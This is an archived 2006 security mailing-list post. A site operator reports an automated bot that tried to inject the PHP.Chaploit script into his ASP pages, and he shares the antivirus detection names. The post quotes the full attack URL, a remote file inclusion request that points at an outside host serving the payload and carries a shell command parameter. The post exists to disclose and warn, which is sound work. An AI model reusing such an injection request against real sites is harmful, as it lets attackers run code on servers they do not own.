| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <052301c6153e$24704150$b000a8c0@cybergeneration.com> Date: Mon Jan 9 17:04:37 2006 From: mducharme at cybergeneration.com (Maxime Ducharme) Subject: Sidewinder Command/Safemode Exploit 4.1 (PHP.Chaploit) Hello we got hit by whats looks like a bot trying to inject PHP.Chaploit in our sites Host is in 202.226.224.* User-Agent : lwp-trivial/1.35 the bot hit one of our dynamic pages (ASP) trying to inject the PHP script located on http://www.foxcf.hpgvip.com.br/cse.gif Full URL was ourpage.asp?ID=ID=http://www.foxcf.hpgvip.com.br/cse.gif?&cmd=cat%20bugado obviously trying to inject PHP in ASP isnt a good idea, thats what makes me think this is automated (and dumb) attack Virustotal says : AntiVir 6.33.0.75 01.09.2006 Linux/Rootkit Avast 4.6.695.0 01.09.2006 PHP:Chaploit Avira 6.33.0.75 01.09.2006 Linux/Rootkit DrWeb 4.33 01.09.2006 PHP.Chaploit Kaspersky 4.0.2.24 01.09.2006 Exploit.PHP.e McAfee 4669 01.06.2006 PHP/Chaploit (other didnt detect anything) I also advised sysadmin of the web server hosting this file. i just wanted to share this information with the community have a nice day Maxime Ducharme
Powered by blists - more mailing lists